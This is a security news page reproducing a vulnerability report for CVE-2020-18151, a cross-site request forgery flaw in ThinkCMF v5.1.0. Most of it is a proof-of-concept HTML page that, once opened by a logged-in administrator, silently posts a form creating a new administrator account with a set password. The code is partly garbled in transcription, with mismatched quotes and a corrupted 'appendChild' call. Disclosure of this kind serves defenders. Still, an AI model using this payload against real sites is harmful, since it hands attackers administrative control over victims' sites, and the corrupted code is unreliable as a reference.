Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-18151: I found a CSRF vulnerability that can add the administrator account · Issue #580 · thinkcmf/thinkcmf

Cross Site Request Forgery (CSRF) vulnerability in ThinkCMF v5.1.0, which can add an admin account.

CVE
#csrf#vulnerability#java

After the administrator loged in, open the page containing the following code. An administrator account will be added automatically.
(please replace “http://tp.im” in “url” with the domain name you set.)

<html><body>
<script type="text/javascript">
function post(url, fields)
{
var p = document.createElement(“form”);
p.action = url;
p.innerHTML = fields;
p.target = “_self";
p.method = “post";
document.body.appendChild§;
p.submit();
}
function csrf_hack()
{
var fields;
fields += " <input type="hidden” name="user_login” value="CSRFadministrator" />";
fields += " <input type="hidden" name="user_pass" value="admin1234" />";
fields += " <input type="hidden" name="user_email" value="[email protected]" />";
fields += " <input type="hidden" name="role_id[]" value="1" />";

var url = "http://tp.im/admin/user/addpost.html";
post(url, fields);
}
window.onload = function(){csrf_hack();}
</script>
</body></html>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907